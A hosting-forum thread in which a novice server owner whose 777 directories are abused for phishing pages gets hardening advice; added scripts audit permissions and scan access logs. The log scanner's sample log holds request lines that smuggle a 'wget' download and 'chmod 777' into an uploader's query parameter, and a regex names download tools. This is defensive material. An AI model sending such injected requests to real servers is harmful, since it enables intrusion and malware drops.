  1. #1

    urgent -- server hacking...

    Hello,
    I have a server and these days my server is being hacked by a hacker.
    The problem is chmod 777: there are many directories with chmod 777,
    and the hacker is uploading files and creating folders under the folders
    which were created with chmod 777. Now I just want to know how I can
    block the hacker, and is there any way to allow the scripts which are on
    my server and not allow any other scripts to upload files to my server?

    I have a Linux server.
    Please give me a reply with full details including commands; I don't know much.

  2. #2
    Join Date
    Feb 2006
    Location
    Kusadasi, Turkey
    Posts
    3,273
    If you are not experienced with server management, you should hire an admin or a management company.

    Is your server Linux Centos with cPanel?

  3. #3
    Join Date
    Apr 2007
    Location
    zero one zero one zero
    Posts
    1,468
    So how is the hacker hacking in? Via incorrect permissions (NEVER set 777 permissions; run PHP as CGI with suPHP to deal with PHP permission problems).

    You could use iptables to block the IP. I'm not about to write a full tutorial on your behalf; google it and learn the lovely Linux.

  4. #4
    Quote Originally Posted by Harzem View Post
    If you are not experienced with server management, you should hire an admin or a management company.

    Is your server Linux Centos with cPanel?
    You are right, but the issue is I don't have money at this time. This month I already lost much of my money due to this issue; that's why I just registered to WebHostingTalk. I just think I can get good help here.

  5. #5
    Join Date
    Feb 2006
    Location
    Kusadasi, Turkey
    Posts
    3,273
    Do you have a one-time $30-$50? Is your server CentOS with cPanel?

    To help you, you need to provide us more info about your server.

  6. #6
    Join Date
    Jan 2006
    Location
    Athens, Greece
    Posts
    1,479
    If you are running open source software like WordPress, update it to the latest version.
    If you have a custom-made uploading page... then you need to find someone to
    make it more secure. Or better yet, make it secure.

  7. #7
    Quote Originally Posted by Harzem View Post
    Do you have a one-time $30-$50? Is your server CentOS with cPanel?

    To help you, you need to provide us more info about your server.
    $50 is 4000 Rs here for us, and I lost 20,000 Rs this month because I got this issue and my server company blocked me, so I changed server company. The new company is good and they just send me reports, and I fix it each time, but my solution is only deleting files and directories. I want a proper solution.

    Here are my server details:
    it's cPanel
    and CentOS 5.1-32

  8. #8
    Quote Originally Posted by Steve_Arm View Post
    If you are running open source software like WordPress, update it to the latest version.
    If you have a custom-made uploading page... then you need to find someone to
    make it more secure. Or better yet, make it secure.
    I don't know, but I think my clients have uploading scripts; that's why they need to change chmod to 777. And if I secure a PHP script it cannot help, because someone told me the hacker does not use your PHP script to upload files and folders; the hacker uses their own script which is saved on their own server or on free hosting.

  9. #9
    Join Date
    Sep 2005
    Location
    Frankfurt/Germany
    Posts
    29
    Even if your clients need to upload files, there is no need to ever chmod 777. I would suggest shutting down the server to prevent further damage and letting some gifted admin take a look at it.

  10. #10
    Join Date
    Apr 2007
    Location
    zero one zero one zero
    Posts
    1,468
    You really need to explain the problem some more, because it doesn't quite make sense to me. How exactly are the hackers getting in?

  11. #11
    Join Date
    May 2002
    Location
    Kingston, Ontario
    Posts
    1,573
    You need to use suPHP or PHPSUEXEC. A shared environment that allows 777 permissions is just asking for trouble.

  12. #12
    Quote Originally Posted by SuperBytes View Post
    You really need to explain the problem some more, because it doesn't quite make sense to me. How exactly are the hackers getting in?
    OK, I have one server. I know about basic management, but I have no idea about security. I just installed a firewall, updated Apache, and installed Zend, but these things are not helpful.

    Now I am on a new server. I was thinking that the hacker cannot do this on my new server, but it's happening on the new server too. I also tried changing the root password, but same issue.

    The hacker is committing abuse by uploading files to my server.
    The hacker uploads files to /home/user/public_html/anyfolder,
    but every time I have checked, the "anyfolder" chmod is 777.
    The hacker can upload and start abuse like creating clone sites of banks.

    But I think the hacker uses a PHP script to upload files which is on another server, not on mine.

  13. #13
    Join Date
    Jul 2007
    Posts
    2,050
    Giving chmod 777 is always a bad idea. You will screw up your server yourself.

  14. #14
    In the console:

    /scripts/easyapache

    With that you will start an Apache compilation; set up your favourite settings, activate suPHP or phpSUEXEC, save and compile.... It is very easy.....

    When the installation finishes, all folders and files with chmod 777 will not work; a 500 INTERNAL SERVER ERROR will appear, because with suPHP you only need the max privilege chmod 755 <------ only for all that need write permissions.


    bye !

  15. #15
    Join Date
    Nov 2004
    Location
    Australia
    Posts
    1,683
    And after the above step, run the following command to remove write permission on both directories and files:

    find /home \( -perm -2 -o -perm -20 \) -print0 | xargs -0 chmod go-w

    Also you can run this fairly safely:

    cd /home
    chgrp nobody */public_html
    chmod o= */public_html


    This will help ensure public_html has the right permissions to allow access to apache and to prevent access by anyone else.
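
    An added audit that is not part of the post: it lists what the find command above would touch before anything is changed, shows PHP files sitting in world-writable directories (the symptom described in this thread), and then applies the same go-w fix. It assumes GNU find and chmod, and builds a constructed sample tree in a temporary directory rather than touching /home:

```sh
#!/bin/sh
# Added example, not from the thread. Assumes GNU find/chmod (CentOS has them).

# list_open_paths ROOT: directories and regular files under ROOT that are
# group- or world-writable, the same test the find command in the post uses.
# Symlinks are skipped because their mode bits are meaningless.
list_open_paths() {
    find "$1" \( -type d -o -type f \) \( -perm -0002 -o -perm -0020 \) | sort
}

# php_in_open_dirs ROOT: PHP files sitting directly inside a world-writable
# directory, which is exactly where dropped upload scripts and phishing
# kits turn up. Review these before locking anything down.
php_in_open_dirs() {
    find "$1" -type d -perm -0002 | while IFS= read -r d; do
        find "$d" -maxdepth 1 -type f -name '*.php'
    done | sort
}

# lock_down ROOT: strip group/other write bits; "-exec ... +" passes paths
# without word-splitting, so odd file names cannot break it. Prints the
# number of paths changed.
lock_down() {
    find "$1" \( -type d -o -type f \) \( -perm -0002 -o -perm -0020 \) \
        -exec chmod -v go-w {} + | wc -l | tr -d ' '
}

# build_sample_tree: a constructed docroot with one 777 upload directory
# holding a stray PHP file; prints the temporary root it created.
build_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/public_html/uploads" "$t/public_html/images"
    touch "$t/public_html/uploads/x.php" "$t/public_html/uploads/pic.jpg" \
          "$t/public_html/images/logo.png"
    chmod 755 "$t/public_html" "$t/public_html/images"
    chmod 644 "$t/public_html/uploads/x.php" "$t/public_html/uploads/pic.jpg" \
              "$t/public_html/images/logo.png"
    chmod 777 "$t/public_html/uploads"
    printf '%s\n' "$t"
}

# Stand-alone run: audit, then fix, then confirm nothing open remains.
ROOT=$(build_sample_tree)
echo "open paths:";       list_open_paths "$ROOT"
echo "php in open dirs:"; php_in_open_dirs "$ROOT"
echo "changed: $(lock_down "$ROOT")"
echo "open after fix: $(list_open_paths "$ROOT" | wc -l)"
rm -rf "$ROOT"
```

    On a real cPanel box the ROOT argument would be /home, and the php_in_open_dirs output is the list to inspect (and preserve for the record) before lock_down runs.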

  16. #16
    Join Date
    Nov 2002
    Location
    WebHostingTalk
    Posts
    8,878
    You can take all the advice that has been given to you here, and the bottom line is, 48 hours later, you're going to get compromised again.

    If you don't know how to secure your server, you need to hire a security administrator or company to assist you. You cannot expect WHT to fill that role for you.

    If you can't afford this, then return your server to your provider and get out of this business.

    Owning a server is a ton of responsibility. Part of that responsibility is making sure your server is secure, so that the rest of us on the net don't have to deal with exploits and spamming originating from your server.

    Again - hire a company to clean up your server and maintain its security, or close up shop.



    Sirius

  17. #17
    Join Date
    Dec 2002
    Location
    chica go go
    Posts
    11,858
    Install mod_security and a good ruleset. www.gotroot.com has some good ones.

  18. #18
    Join Date
    Jun 2002
    Posts
    1,376
    Quote Originally Posted by asif-iqbal View Post
    The hacker is committing abuse by uploading files to my server.
    The hacker uploads files to /home/user/public_html/anyfolder
    Is it always the same user?

    But I think the hacker uses a PHP script to upload files which is on another server, not on mine.
    This doesn't make sense. An insecure PHP script on another server couldn't affect your server. My guess is that there's a PHP script on one of your clients' sites with a security flaw. Maybe an old version of phpBB, for example. (Or many other things.)

    The typical MO is that 'script kiddies' find an old, insecure PHP application on a server, and exploit it to make it download a file to /tmp and run it. I don't know for sure that this is what's happening, but it's my guess.

    If you keep access logs with Apache (I'm pretty sure that every version of Apache does this by default), you can try something like:
    grep wget /path/to/access_log

    to search for queries involving "wget," a common tool to download scripts. If this returns results, look at what file on your server they're requesting -- it's probably how they're getting in!

    If searching for "wget" doesn't turn up anything, you might also search for "tmp" (since it's common to write to /tmp), but note that "tmp" in and of itself may come up in normal use. And if everything keeps being chmod'ed to 777, try searching for "chmod" (grep chmod /path/to/access_log).

    Do you want to try that and report back if you find anything?
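
    The log check described above, written out as an added example that is not part of the original post. It assumes Apache's default "combined" log format (client IP in field 1, request path in field 7) and works on a constructed sample log rather than a real one:

```sh
#!/bin/sh
# Added example, not from the thread: scan Apache access-log lines for the
# download/permission indicators the post mentions and report which local
# script is requested alongside them, plus the client IPs involved.

# Constructed sample in Apache "combined" format. The addresses are from the
# documentation ranges and the hostname is invalid, so nothing here is real.
SAMPLE_LOG=$(cat <<'EOF'
203.0.113.5 - - [10/Jan/2008:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2008:10:02:15 +0000] "GET /gallery/old_uploader.php?f=cd%20/tmp;wget%20http://example.invalid/x.txt HTTP/1.1" 200 56 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Jan/2008:10:02:18 +0000] "GET /gallery/old_uploader.php?f=chmod%20777%20/tmp/x.txt HTTP/1.1" 200 56 "-" "libwww-perl/5.805"
203.0.113.9 - - [10/Jan/2008:10:03:40 +0000] "GET /about/tmpl/page.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
EOF
)

# wget/curl/chmod anywhere in the line; /tmp only as a whole path component,
# so a legitimate /tmpl/ directory (the false positive the post warns about)
# does not trigger.
INDICATORS='wget|curl|chmod|/tmp([^a-zA-Z0-9_]|$)'

# suspicious_requests: keep only the log lines (stdin) that carry an indicator.
suspicious_requests() {
    grep -Ei "$INDICATORS"
}

# scripts_hit: for each requested script (field 7 with the query string cut
# off) print "count<TAB>path", most-hit first; that script is the likely hole.
scripts_hit() {
    suspicious_requests \
      | awk '{ split($7, u, "?"); print u[1] }' \
      | sort | uniq -c | sort -rn \
      | awk '{ printf "%s\t%s\n", $1, $2 }'
}

# client_ips: unique client addresses behind the indicator requests, i.e. the
# list to compare against later log entries or feed into the firewall.
client_ips() {
    suspicious_requests | awk '{ print $1 }' | sort -u
}

# Stand-alone run on the constructed sample. On a real server pipe in the log
# instead, e.g.:  cat /path/to/access_log | scripts_hit
printf '%s\n' "$SAMPLE_LOG" | scripts_hit
printf '%s\n' "$SAMPLE_LOG" | client_ips
```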

  19. #19
    Join Date
    Jan 2008
    Location
    India
    Posts
    287

    Hello,

    I have given the steps just follow them, If you are still unable to get that working email me.

    EXPLOIT REMOVAL INSTRUCTIONS ON NON-VPS SERVER (Linux/Unix)

    1. Execute the following 3 command lines as root by copy/paste. This will harden files commonly abused to upload exploits and list possible exploits. This script only searches for possible exploits owned by the webserver username, but it is possible that exploits could have been uploaded by a current or previous user account to the searched directories. So, you still need to manually investigate all files in the searched directories even if the script returns no results. Possible exploits found should be investigated and removed followed by rebooting the server to kill any running exploit processes. You can refer to the "xplts" file generated by these commands for later reference.


    sh

    echo -e "\tHARDEN" | tee xplts
    for x in `which wget curl fetch lynx links`; do
        chown -vv 0:0 $x | tee -a xplts
        chmod -vv 0550 $x | tee -a xplts
    done
    echo -e "\n\tSEARCH" | tee -a xplts
    for x in /tmp /var/tmp /dev/shm /usr/local/apache/proxy /var/spool /usr/games; do
        ls -loAFR $x 2>/dev/null | grep -E "^/| apache | nobody | unknown | www | web | htdocs " | grep -E "^/|^[bcdlsp-]|\.pl$" | grep -Ev "sess_|dos-" | tee -a xplts
    done
    echo -e "\n\tSUMMARY"
    # count entries from the SEARCH section only, so the chown/chmod messages above are not miscounted
    count() { sed -n '/SEARCH/,$p' xplts | grep -Ev "^/" | grep -c "^$1"; }
    echo -e "Block File: \t\t`count b`"
    echo -e "Character File: \t`count c`"
    echo -e "Directory: \t\t`count d`"
    echo -e "Symbolic Link: \t\t`count l`"
    echo -e "Socket Link: \t\t`count s`"
    echo -e "FIFO: \t\t\t`count p`"
    echo -e "Regular File: \t\t`count -`"

    exit


    2. You should also install and run rkhunter,
    which is a scanning tool to ensure you are about 99.9% clean of rootkits, backdoors, and local exploits. If any rootkits, backdoors, or local exploits are found by rkhunter, you must investigate further and remove them or submit a reload ticket.

    On BSD systems:
    cd /usr/ports/security/rkhunter; make install clean; rehash; rkhunter -c

    On RedHat, Fedora, CentOS systems:
    yum -y install rkhunter; rkhunter -c

  20. #20
    Join Date
    Nov 2004
    Location
    Australia
    Posts
    1,683
    Quote Originally Posted by servertechs View Post
    Hello,

    I have given the steps just follow them, If you are still unable to get that working email me.
    With his level of expertise, this really isn't going to be enough. I'm with serversphere; he needs to hire someone to harden his system, or give back the server and stop wasting both your time and ours.

    System administration is a skill; just like you wouldn't get an unskilled labourer to build your house, don't expect to be able to run a server without at least some knowledge.

  21. #21
    Join Date
    Jul 2004
    Location
    Athens, Greece
    Posts
    203
    According to the details he provided, he doesn't seem really experienced. So he obviously needs to hire a system administrator to investigate and secure his server, to avoid further trouble. I really find it a bad idea to start giving him commands/scripts without knowing the source of his problems.

    Thank you.

  22. #22

    apache web server hardened on linux fc6

    Quote Originally Posted by Harzem View Post
    Do you have a one time 30$-50$? Is your server Centos with cPanel?

    To help you, you need to provide us more info about your server.
    I do have $30 - $50, but I'm quite sure my server will need a bit more work done. We recently got compromised by some phishers and are in need of someone to come in and harden our Apache install, as well as perhaps continue to perform maintenance on the server in the future. We would also like to know what we can do to continue to prevent this from happening again with changes to our normal procedures.

    Thanks in advance,

    Matt Ball
    PCR

    Server specs:
    Linux "chomped-hostname" 2.6.22.9-61.fc6 #1 SMP Thu Sep 27 17:45:57 EDT 2007 i686 i686 i386 GNU/Linux
    PHP Version: 5.2.4
    Web Server: Apache/2.2.4 (Unix) DAV/2 PHP/5.2.4
    Joomla! Version: Joomla! 1.0.14 RC1 Stable
